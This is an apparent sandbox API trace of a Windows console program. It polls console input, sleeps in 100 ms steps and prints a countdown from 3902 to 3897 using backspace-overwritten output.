[0183.309] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0183.309] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6013
[0183.310] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083902") returned 8
[0183.310] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0183.310] __iob_func () returned 0x757a2900
[0183.310] _fileno (_File=0x757a2920) returned 1
[0183.310] _errno () returned 0x5507d8
[0183.310] _get_osfhandle (_FileHandle=1) returned 0x4c
[0183.310] _errno () returned 0x5507d8
[0183.310] GetFileType (hFile=0x4c) returned 0x2
[0183.310] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0183.310] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0183.310] lstrlenW (lpString="\x08\x08\x08\x083902") returned 8
[0183.310] GetConsoleOutputCP () returned 0x1b5
[0183.310] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083902", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0183.310] GetConsoleOutputCP () returned 0x1b5
[0183.310] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083902", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083902", lpUsedDefaultChar=0x0) returned 8
[0183.310] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0183.311] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0183.311] Sleep (dwMilliseconds=0x64)
[0183.418] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0183.418] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6013
[0183.418] Sleep (dwMilliseconds=0x64)
[0183.527] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0183.528] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6013
[0183.528] Sleep (dwMilliseconds=0x64)
[0183.637] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0183.637] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6013
[0183.637] Sleep (dwMilliseconds=0x64)
[0183.746] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0183.746] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6013
[0183.746] Sleep (dwMilliseconds=0x64)
[0183.855] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0183.855] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6013
[0183.855] Sleep (dwMilliseconds=0x64)
[0183.964] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0183.965] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6013
[0183.965] Sleep (dwMilliseconds=0x64)
[0184.073] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0184.074] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6013
[0184.074] Sleep (dwMilliseconds=0x64)
[0184.183] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0184.183] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6013
[0184.183] Sleep (dwMilliseconds=0x64)
[0184.292] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0184.292] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6014
[0184.292] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083901") returned 8
[0184.292] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0184.292] __iob_func () returned 0x757a2900
[0184.292] _fileno (_File=0x757a2920) returned 1
[0184.292] _errno () returned 0x5507d8
[0184.292] _get_osfhandle (_FileHandle=1) returned 0x4c
[0184.292] _errno () returned 0x5507d8
[0184.292] GetFileType (hFile=0x4c) returned 0x2
[0184.293] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0184.293] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0184.293] lstrlenW (lpString="\x08\x08\x08\x083901") returned 8
[0184.293] GetConsoleOutputCP () returned 0x1b5
[0184.293] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083901", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0184.293] GetConsoleOutputCP () returned 0x1b5
[0184.293] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083901", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083901", lpUsedDefaultChar=0x0) returned 8
[0184.293] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0184.293] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0184.293] Sleep (dwMilliseconds=0x64)
[0184.401] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0184.401] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6014
[0184.401] Sleep (dwMilliseconds=0x64)
[0184.510] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0184.510] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6014
[0184.510] Sleep (dwMilliseconds=0x64)
[0184.619] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0184.620] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6014
[0184.620] Sleep (dwMilliseconds=0x64)
[0184.729] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0184.729] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6014
[0184.729] Sleep (dwMilliseconds=0x64)
[0184.838] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0184.838] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6014
[0184.838] Sleep (dwMilliseconds=0x64)
[0184.947] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0184.947] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6014
[0184.947] Sleep (dwMilliseconds=0x64)
[0185.056] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0185.056] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6014
[0185.056] Sleep (dwMilliseconds=0x64)
[0185.165] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0185.166] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6014
[0185.166] Sleep (dwMilliseconds=0x64)
[0185.275] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0185.275] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6015
[0185.275] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083900") returned 8
[0185.275] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0185.275] __iob_func () returned 0x757a2900
[0185.275] _fileno (_File=0x757a2920) returned 1
[0185.275] _errno () returned 0x5507d8
[0185.275] _get_osfhandle (_FileHandle=1) returned 0x4c
[0185.275] _errno () returned 0x5507d8
[0185.275] GetFileType (hFile=0x4c) returned 0x2
[0185.275] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0185.275] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0185.275] lstrlenW (lpString="\x08\x08\x08\x083900") returned 8
[0185.275] GetConsoleOutputCP () returned 0x1b5
[0185.275] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083900", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0185.276] GetConsoleOutputCP () returned 0x1b5
[0185.276] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083900", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083900", lpUsedDefaultChar=0x0) returned 8
[0185.276] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0185.276] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0185.276] Sleep (dwMilliseconds=0x64)
[0185.384] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0185.384] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6015
[0185.384] Sleep (dwMilliseconds=0x64)
[0185.493] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0185.493] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6015
[0185.493] Sleep (dwMilliseconds=0x64)
[0185.602] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0185.603] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6015
[0185.603] Sleep (dwMilliseconds=0x64)
[0185.712] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0185.712] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6015
[0185.712] Sleep (dwMilliseconds=0x64)
[0185.821] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0185.821] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6015
[0185.821] Sleep (dwMilliseconds=0x64)
[0185.930] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0185.930] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6015
[0185.930] Sleep (dwMilliseconds=0x64)
[0186.039] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0186.039] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6015
[0186.039] Sleep (dwMilliseconds=0x64)
[0186.148] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0186.148] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6015
[0186.148] Sleep (dwMilliseconds=0x64)
[0186.257] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0186.258] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6016
[0186.258] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083899") returned 8
[0186.258] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0186.258] __iob_func () returned 0x757a2900
[0186.258] _fileno (_File=0x757a2920) returned 1
[0186.258] _errno () returned 0x5507d8
[0186.258] _get_osfhandle (_FileHandle=1) returned 0x4c
[0186.258] _errno () returned 0x5507d8
[0186.258] GetFileType (hFile=0x4c) returned 0x2
[0186.258] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0186.258] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0186.258] lstrlenW (lpString="\x08\x08\x08\x083899") returned 8
[0186.258] GetConsoleOutputCP () returned 0x1b5
[0186.258] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083899", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0186.258] GetConsoleOutputCP () returned 0x1b5
[0186.258] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083899", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083899", lpUsedDefaultChar=0x0) returned 8
[0186.258] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0186.258] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0186.259] Sleep (dwMilliseconds=0x64)
[0186.367] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0186.367] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6016
[0186.367] Sleep (dwMilliseconds=0x64)
[0186.497] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0186.498] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6016
[0186.498] Sleep (dwMilliseconds=0x64)
[0186.600] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0186.601] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6016
[0186.601] Sleep (dwMilliseconds=0x64)
[0186.710] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0186.710] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6016
[0186.710] Sleep (dwMilliseconds=0x64)
[0186.827] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0186.827] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6016
[0186.827] Sleep (dwMilliseconds=0x64)
[0186.928] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0186.928] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6016
[0186.928] Sleep (dwMilliseconds=0x64)
[0187.037] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0187.038] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6016
[0187.038] Sleep (dwMilliseconds=0x64)
[0187.147] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0187.147] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6016
[0187.147] Sleep (dwMilliseconds=0x64)
[0187.256] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0187.256] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6017
[0187.256] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083898") returned 8
[0187.256] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0187.256] __iob_func () returned 0x757a2900
[0187.256] _fileno (_File=0x757a2920) returned 1
[0187.256] _errno () returned 0x5507d8
[0187.256] _get_osfhandle (_FileHandle=1) returned 0x4c
[0187.256] _errno () returned 0x5507d8
[0187.257] GetFileType (hFile=0x4c) returned 0x2
[0187.257] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0187.257] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0187.257] lstrlenW (lpString="\x08\x08\x08\x083898") returned 8
[0187.257] GetConsoleOutputCP () returned 0x1b5
[0187.257] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083898", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0187.257] GetConsoleOutputCP () returned 0x1b5
[0187.257] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083898", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083898", lpUsedDefaultChar=0x0) returned 8
[0187.257] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0187.257] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0187.257] Sleep (dwMilliseconds=0x64)
[0187.365] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0187.365] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6017
[0187.365] Sleep (dwMilliseconds=0x64)
[0187.474] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0187.474] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6017
[0187.474] Sleep (dwMilliseconds=0x64)
[0187.584] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0187.585] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6017
[0187.585] Sleep (dwMilliseconds=0x64)
[0187.724] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0187.724] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6017
[0187.724] Sleep (dwMilliseconds=0x64)
[0187.834] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0187.834] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6017
[0187.834] Sleep (dwMilliseconds=0x64)
[0187.973] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0187.973] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6017
[0187.973] Sleep (dwMilliseconds=0x64)
[0188.114] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0188.114] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6017
[0188.114] Sleep (dwMilliseconds=0x64)
[0188.254] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0188.254] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6018
[0188.254] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083897") returned 8
[0188.254] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0188.254] __iob_func () returned 0x757a2900
[0188.254] _fileno (_File=0x757a2920) returned 1
[0188.254] _errno () returned 0x5507d8
[0188.255] _get_osfhandle (_FileHandle=1) returned 0x4c
[0188.255] _errno () returned 0x5507d8
[0188.255] GetFileType (hFile=0x4c) returned 0x2
[0188.255] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0188.255] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0188.255] lstrlenW (lpString="\x08\x08\x08\x083897") returned 8
[0188.255] GetConsoleOutputCP () returned 0x1b5
[0188.255] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083897", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0188.255] GetConsoleOutputCP () returned 0x1b5
[0188.255] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083897", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083897", lpUsedDefaultChar=0x0) returned 8
[0188.255] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0188.255] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0188.255] Sleep (dwMilliseconds=0x64)
[0188.395] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0188.395] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6018
[0188.395] Sleep (dwMilliseconds=0x64)
[0188.587] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0188.587] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6018
[0188.587] Sleep (dwMilliseconds=0x64)
[0188.739] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0188.739] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6018
[0188.739] Sleep (dwMilliseconds=0x64)
[0188.931] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0188.932] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6018
[0188.932] Sleep (dwMilliseconds=0x64)
[0189.112] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0189.112] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6018
[0189.112] Sleep (dwMilliseconds=0x64)
[0189.299] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0189.299] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6019
